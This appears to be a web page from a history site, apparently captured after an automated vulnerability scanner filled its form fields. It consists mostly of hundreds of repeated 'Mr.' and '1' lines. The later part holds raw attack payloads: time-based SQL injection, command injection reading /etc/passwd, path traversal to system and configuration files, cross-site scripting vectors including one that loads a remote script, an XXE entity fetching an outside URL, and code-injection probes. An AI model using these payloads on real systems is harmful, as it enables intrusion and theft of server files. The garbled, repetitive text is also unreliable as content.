avec Herodote.net
 
 
 

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

response.write(9578393*9198143)

Mr.

'+response.write(9578393*9198143)+'

Mr.

"+response.write(9578393*9198143)+"

Mr.

1

SomeCustomInjectedHeader:injected_by_wvs

1

Mr.

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

response.write(9046979*9667422)

1

'+response.write(9046979*9667422)+'

1

"+response.write(9046979*9667422)+"

1

Mr.

1

Mr.

1

Mr.

1

Mr.

${100442+99238}

Mr.

1

Mr.

1

Mr.

1

Mr.

1

${99350+99764}

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1&n911178=v955005

Mr.&n954996=v958800

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

Mr.

'"()

Mr.

)

Mr.

!(()&&!|*|*|

Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Mr.

^(#$!@#$)(()))******

Mr.

1some_inexistent_file_with_long_name%00.jpg

1

Mr.

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

Mr.

testasp.vulnweb.com

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

)

1

Mr.

1

!(()&&!|*|*|

1

Mr.

1

^(#$!@#$)(()))******

1

Mr.

1

Mr.

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.

1

1some_inexistent_file_with_long_name%00.

1

http://testasp.vulnweb.com/t/fit.txt?%00.

1

Mr.

1

testasp.vulnweb.com

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/xss.html?%00.jpg

Mr.

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/fit.txt

http://testasp.vulnweb.com/t/fit.txt

1

Mr.

1

Mr.

1

Mr.

Mr.

268435455

Mr.

h

Mr.

..

Mr.

1e309

Mr.

'"\'\");|]*{ <>''

Mr.

Mr.

1

Mr.

1

Mr.

;print(md5(acunetix_wvs_security_test));

Mr.

';print(md5(acunetix_wvs_security_test));$a='

Mr.

";print(md5(acunetix_wvs_security_test));$a="

Mr.

${@print(md5(acunetix_wvs_security_test))}

Mr.

${@print(md5(acunetix_wvs_security_test))}\

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

1

Mr.

1

268435455

1

h

1

..

1

1e309

1

'"\'\");|]*{ <>''

1

1

;print(md5(acunetix_wvs_security_test));

1

';print(md5(acunetix_wvs_security_test));$a='

1

";print(md5(acunetix_wvs_security_test));$a="

1

${@print(md5(acunetix_wvs_security_test))}

1

${@print(md5(acunetix_wvs_security_test))}\

1

Mr.

1

Mr.

acunetix_wvs_invalid_filename

Mr.

frises_creer.php

Mr.

frises_creer.php

Mr.

frises_creer.php/.

Mr.

1

Mr.

1

Mr.

1 and sleep(4)

Mr.

1 or (sleep(4)+1) limit 1 --

Mr.

1' and sleep(4)='

Mr.

1' and (sleep(4)+1) limit 1 --

Mr.

1" and sleep(4)="

Mr.

1

Mr.

1' or (sleep(4)+1) limit 1 --

Mr.

1" or (sleep(4)+1) limit 1 --

Mr.

1'=sleep(4)='

Mr.

1"=sleep(4)="

Mr.

1'+(select 1 from (select sleep(4))A)+'

Mr.

1;select pg_sleep(4); --

Mr.

1';select pg_sleep(4); --

Mr.

1; waitfor delay '0:0:4' --

Mr.

1'; waitfor delay '0:0:4' --

Mr.

1"; waitfor delay '0:0:4' --

Mr.

1

Mr.

1

acunetix_wvs_invalid_filename

1

frises_creer.php

1

frises_creer.php

1

frises_creer.php/.

1

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://www.acunetix.tst

Mr.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

http://www.acunetix.tst

1

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

1

Mr.

1

Mr.

1

Mr.

1

Mr.

&cat /etc/passwd&

Mr.

'&cat /etc/passwd&'

Mr.

"&cat /etc/passwd&"

Mr.

cat /etc/passwd

Mr.

`cat /etc/passwd`

Mr.

|cat /etc/passwd#

Mr.

'|'ld

Mr.

"|"ld

Mr.

;cat /etc/passwd;

Mr.

';cat /etc/passwd;'

Mr.

'"

Mr.

";cat /etc/passwd;"

Mr.

<!--

Mr.

||cat /etc/passwd

Mr.

&dir

Mr.

'&dir&'

Mr.

"&dir&"

Mr.

|dir

Mr.

'|dir

Mr.

"|dir

'"

1

<!--

1

Mr.

1

Mr.

1

Mr.' and sleep(4)='

1

Mr.' and (sleep(4)+1) limit 1 --

1

Mr." and sleep(4)="

1

Mr.' or (sleep(4)+1) limit 1 --

1

Mr." or (sleep(4)+1) limit 1 --

1

Mr.'=sleep(4)='

1

Mr."=sleep(4)="

1

Mr.'+(select 1 from (select sleep(4))A)+'

1

Mr. and sleep(4)

1

Mr. or (sleep(4)+1) limit 1 --

1

Mr.';select pg_sleep(4); --

1

Mr.'; waitfor delay '0:0:4' --

1

Mr."; waitfor delay '0:0:4' --

1

Mr.

1'"()&%<ScRiPt >prompt(994904)</ScRiPt>

Mr.

1_922024

Mr.'"()&%<ScRiPt >prompt(952347)</ScRiPt>

1

Mr._960820

1

acu2965<s1﹥s2ʺs3ʹuca2965

1

acux4163z1z2abcxuca4163

1

Mr.<ScRiPt >prompt(937055)</ScRiPt>

1

Mr.<script>prompt(953337)</script>

1

Mr.<ScRiPt >prompt(951212)</ScRiPt>

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952562></ScRiPt>

1

Mr.<ScRiPt >prompt(921432)</ScRiPt>

1

Mr.<video><source onerror="javascript:prompt(965898)">

1

Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947668)"></g></svg>

1

Mr.<div style=width:expression(prompt(972524))>

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='993776'>

1

Mr.<body onload=prompt(909966)>

1

Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(910589)>

1

Mr.<img src=xyz OnErRor=prompt(941374)>

1

Mr.<img/src=">" onerror=alert(983681)>

1

Mr.%3CScRiPt%20%3Eprompt(923723)%3C/sCripT%3E

1

<img acu onmouseover=prompt(929555) //>

1

Mr.<input autofocus onfocus=prompt(907446)>

1

<a href='http://www.acunetix.com'>website security</a>

1

<a href='http://www.acunetix.com'>website security</a>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

Mr._Vu6Bu <ScRiPt >prompt(923301)</ScRiPt>

1

Mr._Vu6Bu <ScRiPt >prompt(923301)</ScRiPt>

1

<a href='http://www.acunetix.com'>website security</a>

1

Mr.

1

Mr.

1'"

Mr.

1'"

Mr.

\

Mr.

\

Mr.

1xa7

Mr.

@@AVck7

Mr.

JyI=

Mr.

'"

Mr.

''""

&cat /etc/passwd&

1

'&cat /etc/passwd&'

1

"&cat /etc/passwd&"

1

cat /etc/passwd

1

`cat /etc/passwd`

1

|cat /etc/passwd#

1

'|'ld

1

"|"ld

1

;cat /etc/passwd;

1

';cat /etc/passwd;'

1

";cat /etc/passwd;"

1

||cat /etc/passwd

1

&dir

1

'&dir&'

1

"&dir&"

1

|dir

1

'|dir

1

"|dir

1

Mr.

1

1'"

1

\

1

1xa7

1

@@Ud2FA

1

JyI=

1

'"

1

''""

1

Mr.

../../../../../../../../../../etc/passwd

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

../../../../../../../../../../etc/passwd.jpg

Mr.

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

/../..//../..//../..//../..//../..//etc/passwd.jpg

Mr.

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Mr.

/etc/passwd

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Mr.

................etc/passwd

Mr.

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

Mr.

file:///etc/passwd

Mr.

/\../\../\../\../\../\../\../etc/passwd

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

Mr.

../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../boot.ini

Mr.

../../../../../../../../../../windows/win.ini.jpg

Mr.

windowswin.ini

Mr.

................windowswin.ini

Mr.

..\..\..\..\..\..\..\..\windows\win.ini

Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Mr.

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.